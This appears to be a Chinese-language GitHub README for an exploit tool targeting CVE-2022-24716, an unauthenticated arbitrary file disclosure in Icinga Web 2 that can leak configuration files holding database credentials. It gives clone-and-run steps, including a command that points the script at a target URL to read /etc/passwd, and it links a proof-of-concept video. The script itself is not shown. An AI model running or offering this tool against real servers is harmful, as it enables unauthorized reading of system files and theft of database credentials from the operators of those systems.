CVE-2022-24716
Icinga Web 2 <2.8.6, <2.9.6, <2.10 中的任意文件泄露漏洞
Icinga Web 2 是一个开源的监控 Web 界面、框架和命令行接口。未经身份验证的用户可以泄露本地系统中 Web 服务器用户可访问的文件内容,包括包含数据库凭据的 icingaweb2 配置文件。该问题已在 Icinga Web 2 的 2.9.6 和 2.10 版本中解决。应轮换数据库凭据。
克隆与使用
- git clone https://github.com/doosec101/CVE-2022-24716.git
- cd CVE-2022-24716
- pip3 install -r requirements.txt
- python3 CVE-2022-24716.py -u https://example.com -p /etc/passwd
注意:-
建议将路径设置为 /etc/passwd,这样脚本就能告诉你给定的 URL 是否存在漏洞
搜索语法:-
POC:-
https://user-images.githubusercontent.com/128431701/227827785-938f038b-6d17-4a5d-81d9-8399a4b1ccd3.mp4